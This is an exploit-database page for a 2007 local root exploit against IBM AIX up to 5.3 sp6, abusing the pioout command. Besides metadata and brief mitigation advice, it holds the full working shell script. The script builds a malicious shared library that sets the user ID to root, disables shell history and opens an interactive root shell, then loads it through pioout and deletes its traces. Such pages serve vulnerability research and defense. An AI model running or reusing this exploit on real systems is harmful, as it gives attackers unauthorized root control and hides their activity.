header-logo
Suggest Exploit
vendor:
AIX
by:
qaaz
7.5
CVSS
HIGH
Local Privilege Escalation
269
CWE
Product Name: AIX
Affected Version From: Up to 5.3 sp6
Affected Version To: Up to 5.3 sp6
Patch Exists: NO
Related CWE:
CPE: o:ibm:aix:5.3
Metasploit:
Other Scripts:
Platforms Tested: AIX
2007

AIX pioout Local Root Exploit

This exploit allows an attacker to escalate their privileges to root on IBM AIX versions up to 5.3 sp6. It takes advantage of a vulnerability in the AIX pioout command.

Mitigation:

Apply the latest patches and updates from IBM to fix the vulnerability. Additionally, restrict access to the affected system only to trusted users.
Source

Exploit-DB raw data:

#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
	seteuid(0);
	setuid(0);
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", (void *) 0);
	execl("/bin/sh", "sh", "-i", (void *) 0);
	perror("execl");
	exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib

# milw0rm.com [2007-07-27]

Navigation

Suggest Exploit

Services By CQR

cqrsecured